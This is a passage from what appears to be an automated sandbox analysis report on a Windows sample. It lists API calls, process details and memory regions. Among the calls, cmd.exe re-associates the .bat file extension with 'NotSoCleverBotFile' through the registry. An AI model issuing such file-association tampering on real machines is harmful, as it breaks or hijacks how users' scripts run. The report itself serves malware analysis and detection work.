lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5c0618 [0267.488] FindClose (in: hFindFile=0x5c0618 | out: hFindFile=0x5c0618) returned 1 [0267.489] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0267.489] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0267.489] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0267.489] GetProcessHeap () returned 0x5c0000 [0267.489] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5ca7c8) returned 1 [0267.489] GetEnvironmentStringsW () returned 0x5c7cf8* [0267.490] GetProcessHeap () returned 0x5c0000 [0267.490] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xa76) returned 0x5c9d88 [0267.490] FreeEnvironmentStringsA (penv="=") returned 1 [0267.490] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0267.490] GetProcessHeap () returned 0x5c0000 [0267.490] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5c05c8) returned 1 [0267.490] GetProcessHeap () returned 0x5c0000 [0267.490] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x400e) returned 0x5cbc88 [0267.491] GetProcessHeap () returned 0x5c0000 [0267.491] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x48) returned 0x5ca808 [0267.491] GetProcessHeap () returned 0x5c0000 [0267.491] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5cbc88) returned 1 [0267.491] GetConsoleOutputCP () returned 0x1b5 [0267.494] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0267.494] GetUserDefaultLCID () returned 0x409 [0267.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xd334a0, cchData=8 | out: lpLCData=":") returned 2 [0267.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0267.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0267.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0267.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xd334b0, cchData=8 | out: lpLCData="/") returned 2 [0267.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xd33500, cchData=32 | out: lpLCData="Mon") returned 4 [0267.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xd33540, cchData=32 | out: lpLCData="Tue") returned 4 [0267.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xd33580, cchData=32 | out: lpLCData="Wed") returned 4 [0267.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xd335c0, cchData=32 | out: lpLCData="Thu") returned 4 [0267.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xd33600, cchData=32 | out: lpLCData="Fri") returned 4 [0267.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xd33640, cchData=32 | out: lpLCData="Sat") returned 4 [0267.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xd33680, cchData=32 | out: lpLCData="Sun") returned 4 [0267.495] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xd334c0, cchData=8 | out: lpLCData=".") returned 2 [0267.495] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xd334e0, cchData=8 | out: lpLCData=",") returned 2 [0267.495] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0267.497] GetProcessHeap () returned 0x5c0000 [0267.497] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20c) returned 0x5ca8a0 [0267.500] GetConsoleTitleW (in: lpConsoleTitle=0x5ca8a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0267.515] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0267.515] GetProcAddress (hModule=0x74f30000, lpProcName="CopyFileExW") returned 0x74f4ffc0 [0267.515] GetProcAddress (hModule=0x74f30000, lpProcName="IsDebuggerPresent") returned 0x74f4b0b0 [0267.515] GetProcAddress (hModule=0x74f30000, lpProcName="SetConsoleInputExeNameW") returned 0x76beb440 [0267.516] GetProcessHeap () returned 0x5c0000 [0267.516] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x400a) returned 0x5cbc88 [0267.516] GetProcessHeap () returned 0x5c0000 [0267.516] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5cbc88) returned 1 [0267.517] _wcsicmp (_String1="assoc", _String2=")") returned 56 [0267.517] _wcsicmp (_String1="FOR", _String2="assoc") returned 5 [0267.517] _wcsicmp (_String1="FOR/?", _String2="assoc") returned 5 [0267.517] _wcsicmp (_String1="IF", _String2="assoc") returned 8 [0267.517] _wcsicmp (_String1="IF/?", _String2="assoc") returned 8 [0267.518] _wcsicmp (_String1="REM", _String2="assoc") returned 17 [0267.518] _wcsicmp (_String1="REM/?", _String2="assoc") returned 17 [0267.518] GetProcessHeap () returned 0x5c0000 [0267.518] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x58) returned 0x5caab8 [0267.518] GetProcessHeap () returned 0x5c0000 [0267.518] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x14) returned 0x5c7440 [0267.518] GetProcessHeap () returned 0x5c0000 [0267.518] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x3a) returned 0x5cab18 [0267.519] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0267.520] _wcsicmp (_String1="assoc", _String2="DIR") returned -3 [0267.520] _wcsicmp (_String1="assoc", _String2="ERASE") returned -4 [0267.520] _wcsicmp (_String1="assoc", _String2="DEL") returned -3 [0267.520] _wcsicmp (_String1="assoc", _String2="TYPE") returned -19 [0267.520] _wcsicmp (_String1="assoc", _String2="COPY") returned -2 [0267.520] _wcsicmp (_String1="assoc", _String2="CD") returned -2 [0267.520] _wcsicmp (_String1="assoc", _String2="CHDIR") returned -2 [0267.520] _wcsicmp (_String1="assoc", _String2="RENAME") returned -17 [0267.520] _wcsicmp (_String1="assoc", _String2="REN") returned -17 [0267.520] _wcsicmp (_String1="assoc", _String2="ECHO") returned -4 [0267.520] _wcsicmp (_String1="assoc", _String2="SET") returned -18 [0267.521] _wcsicmp (_String1="assoc", _String2="PAUSE") returned -15 [0267.521] _wcsicmp (_String1="assoc", _String2="DATE") returned -3 [0267.521] _wcsicmp (_String1="assoc", _String2="TIME") returned -19 [0267.521] _wcsicmp (_String1="assoc", _String2="PROMPT") returned -15 [0267.521] _wcsicmp (_String1="assoc", _String2="MD") returned -12 [0267.521] _wcsicmp (_String1="assoc", _String2="MKDIR") returned -12 [0267.521] _wcsicmp (_String1="assoc", _String2="RD") returned -17 [0267.521] _wcsicmp (_String1="assoc", _String2="RMDIR") returned -17 [0267.521] _wcsicmp (_String1="assoc", _String2="PATH") returned -15 [0267.521] _wcsicmp (_String1="assoc", _String2="GOTO") returned -6 [0267.521] _wcsicmp (_String1="assoc", _String2="SHIFT") returned -18 [0267.521] _wcsicmp (_String1="assoc", _String2="CLS") returned -2 [0267.521] _wcsicmp (_String1="assoc", _String2="CALL") returned -2 [0267.521] _wcsicmp (_String1="assoc", _String2="VERIFY") returned -21 [0267.521] _wcsicmp (_String1="assoc", _String2="VER") returned -21 [0267.521] _wcsicmp (_String1="assoc", _String2="VOL") returned -21 [0267.521] _wcsicmp (_String1="assoc", _String2="EXIT") returned -4 [0267.521] _wcsicmp (_String1="assoc", _String2="SETLOCAL") returned -18 [0267.521] _wcsicmp (_String1="assoc", _String2="ENDLOCAL") returned -4 [0267.521] _wcsicmp (_String1="assoc", _String2="TITLE") returned -19 [0267.521] _wcsicmp (_String1="assoc", _String2="START") returned -18 [0267.521] _wcsicmp (_String1="assoc", _String2="DPATH") returned -3 [0267.521] _wcsicmp (_String1="assoc", _String2="KEYS") returned -10 [0267.521] _wcsicmp (_String1="assoc", _String2="MOVE") returned -12 [0267.521] _wcsicmp (_String1="assoc", _String2="PUSHD") returned -15 [0267.521] _wcsicmp (_String1="assoc", _String2="POPD") returned -15 [0267.521] _wcsicmp (_String1="assoc", _String2="ASSOC") returned 0 [0267.522] GetProcessHeap () returned 0x5c0000 [0267.522] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x6c) returned 0x5cab60 [0267.524] GetProcessHeap () returned 0x5c0000 [0267.524] RtlReAllocateHeap (Heap=0x5c0000, Flags=0x0, Ptr=0x5cab60, Size=0x3a) returned 0x5cab60 [0267.524] GetProcessHeap () returned 0x5c0000 [0267.524] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5cab60) returned 0x3a [0267.524] GetProcessHeap () returned 0x5c0000 [0267.524] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x46) returned 0x5caba8 [0267.524] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Classes", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19fa14 | out: phkResult=0x19fa14*=0xa0) returned 0x0 [0267.524] GetProcessHeap () returned 0x5c0000 [0267.524] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x6c) returned 0x5cabf8 [0267.527] GetProcessHeap () returned 0x5c0000 [0267.527] RtlReAllocateHeap (Heap=0x5c0000, Flags=0x0, Ptr=0x5cabf8, Size=0x3e) returned 0x5cabf8 [0267.527] GetProcessHeap () returned 0x5c0000 [0267.527] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5cabf8) returned 0x3e [0267.527] GetProcessHeap () returned 0x5c0000 [0267.527] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x12) returned 0x5c7560 [0267.527] GetProcessHeap () returned 0x5c0000 [0267.527] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x2e) returned 0x5cac40 [0267.527] RegCreateKeyExW (in: hKey=0xa0, lpSubKey=".bat", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x19f9cc, lpdwDisposition=0x0 | out: phkResult=0x19f9cc*=0xa4, lpdwDisposition=0x0) returned 0x0 [0267.527] RegSetValueExW (in: hKey=0xa4, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="NotSoCleverBotFile", cbData=0x26 | out: lpData="NotSoCleverBotFile") returned 0x0 [0267.528] RegCloseKey (hKey=0xa4) returned 0x0 [0267.528] _vsnwprintf (in: _Buffer=0xd37940, _BufferCount=0x1fff, _Format="%s=%s\r\n", _ArgList=0x19f9ac | out: _Buffer=".bat=NotSoCleverBotFile\r\n") returned 25 [0267.528] _get_osfhandle (_FileHandle=1) returned 0x3c [0267.528] GetFileType (hFile=0x3c) returned 0x2 [0267.528] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0267.529] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f984 | out: lpMode=0x19f984) returned 1 [0267.529] _get_osfhandle (_FileHandle=1) returned 0x3c [0267.529] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xd37940*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x19f99c, lpReserved=0x0 | out: lpBuffer=0xd37940*, lpNumberOfCharsWritten=0x19f99c*=0x19) returned 1 [0267.530] ApiSetQueryApiSetPresence () returned 0x0 [0267.530] ResolveDelayLoadedAPI () returned 0x6ab62230 [0267.535] DoSHChangeNotify () returned 0x0 [0267.812] GetProcessHeap () returned 0x5c0000 [0267.812] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5cac40) returned 1 [0267.812] GetProcessHeap () returned 0x5c0000 [0267.812] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5c7560) returned 1 [0267.812] RegCloseKey (hKey=0xa0) returned 0x0 [0267.812] _get_osfhandle (_FileHandle=1) returned 0x3c [0267.812] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0267.822] _get_osfhandle (_FileHandle=1) returned 0x3c [0267.822] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0267.822] _get_osfhandle (_FileHandle=0) returned 0x38 [0267.822] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0267.822] SetConsoleInputExeNameW () returned 0x1 [0267.823] GetConsoleOutputCP () returned 0x1b5 [0267.823] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0267.823] SetThreadUILanguage (LangId=0x0) returned 0x409 [0267.823] exit (_Code=0) Thread: id = 164 os_tid = 0x4f4 Process: id = "22" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2205d000" os_pid = "0xe94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x45c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2046 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2047 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2048 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2049 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2050 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2051 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2052 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2053 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2054 start_va = 0x7ff7625c0000 end_va = 0x7ff7625d0fff monitored = 0 entry_point = 0x7ff7625c16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2055 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2056 start_va = 0x600000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2057 start_va = 0x7ffd4e1c0000 end_va = 0x7ffd4e26cfff monitored = 0 entry_point = 0x7ffd4e1d81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2058 start_va = 0x7ffd4d670000 end_va = 0x7ffd4d857fff monitored = 0 entry_point = 0x7ffd4d69ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2059 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2060 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2061 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2062 start_va = 0x7ffd4df00000 end_va = 0x7ffd4df9cfff monitored = 0 entry_point = 0x7ffd4df078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2063 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2064 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2065 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 2066 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2067 start_va = 0x7ffd45030000 end_va = 0x7ffd45088fff monitored = 0 entry_point = 0x7ffd4503fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2068 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2069 start_va = 0x7ffd4dc70000 end_va = 0x7ffd4deecfff monitored = 0 entry_point = 0x7ffd4dd44970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2070 start_va = 0x7ffd4da60000 end_va = 0x7ffd4db7bfff monitored = 0 entry_point = 0x7ffd4daa02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2071 start_va = 0x7ffd4d860000 end_va = 0x7ffd4d8c9fff monitored = 0 entry_point = 0x7ffd4d896d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2072 start_va = 0x7ffd4e9d0000 end_va = 0x7ffd4eb25fff monitored = 0 entry_point = 0x7ffd4e9da8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2073 start_va = 0x7ffd4d8d0000 end_va = 0x7ffd4da55fff monitored = 0 entry_point = 0x7ffd4d91ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2074 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2075 start_va = 0x7ffd50380000 end_va = 0x7ffd504c2fff monitored = 0 entry_point = 0x7ffd503a8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2076 start_va = 0x7ffd4e160000 end_va = 0x7ffd4e1bafff monitored = 0 entry_point = 0x7ffd4e1738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2077 start_va = 0x7ffd4e2e0000 end_va = 0x7ffd4e31afff monitored = 0 entry_point = 0x7ffd4e2e12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2078 start_va = 0x7ffd4db80000 end_va = 0x7ffd4dc40fff monitored = 0 entry_point = 0x7ffd4dba0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2079 start_va = 0x7ffd4b010000 end_va = 0x7ffd4b195fff monitored = 0 entry_point = 0x7ffd4b05d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2080 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2081 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2082 start_va = 0x840000 end_va = 0x9c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 2083 start_va = 0x9d0000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 2084 start_va = 0xb60000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 2085 start_va = 0x1f60000 end_va = 0x20bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 2086 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2087 start_va = 0x6f0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 2088 start_va = 0x7ffd4eb30000 end_va = 0x7ffd5008efff monitored = 0 entry_point = 0x7ffd4ec911f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2089 start_va = 0x7ffd4cb80000 end_va = 0x7ffd4cbc2fff monitored = 0 entry_point = 0x7ffd4cb94b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2090 start_va = 0x7ffd4cce0000 end_va = 0x7ffd4d323fff monitored = 0 entry_point = 0x7ffd4cea64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2091 start_va = 0x7ffd4e480000 end_va = 0x7ffd4e526fff monitored = 0 entry_point = 0x7ffd4e4958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2092 start_va = 0x7ffd500f0000 end_va = 0x7ffd50141fff monitored = 0 entry_point = 0x7ffd500ff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2093 start_va = 0x7ffd4cb70000 end_va = 0x7ffd4cb7efff monitored = 0 entry_point = 0x7ffd4cb73210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2094 start_va = 0x7ffd4d5b0000 end_va = 0x7ffd4d664fff monitored = 0 entry_point = 0x7ffd4d5f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2095 start_va = 0x7ffd4cb10000 end_va = 0x7ffd4cb5afff monitored = 0 entry_point = 0x7ffd4cb135f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2096 start_va = 0x7ffd4caf0000 end_va = 0x7ffd4cb03fff monitored = 0 entry_point = 0x7ffd4caf52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2097 start_va = 0x7ffd4b470000 end_va = 0x7ffd4b505fff monitored = 0 entry_point = 0x7ffd4b495570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2098 start_va = 0x20c0000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 2099 start_va = 0x2270000 end_va = 0x25a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2100 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2101 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2102 start_va = 0x1d0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 2103 start_va = 0x640000 end_va = 0x699fff monitored = 1 entry_point = 0x6553f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 2104 start_va = 0x25b0000 end_va = 0x27c8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 2105 start_va = 0x27d0000 end_va = 0x29e5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 2106 start_va = 0x1f60000 end_va = 0x2069fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 2107 start_va = 0x20b0000 end_va = 0x20bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 2108 start_va = 0x29f0000 end_va = 0x2c0cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 2109 start_va = 0x20c0000 end_va = 0x21cafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 2110 start_va = 0x2260000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 2111 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2112 start_va = 0x7ffd4e320000 end_va = 0x7ffd4e479fff monitored = 0 entry_point = 0x7ffd4e3638e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2113 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2114 start_va = 0x2c10000 end_va = 0x2ccbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c10000" filename = "" Region: id = 2115 start_va = 0x70000 end_va = 0x73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2116 start_va = 0x7ffd4a370000 end_va = 0x7ffd4a391fff monitored = 0 entry_point = 0x7ffd4a371a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" 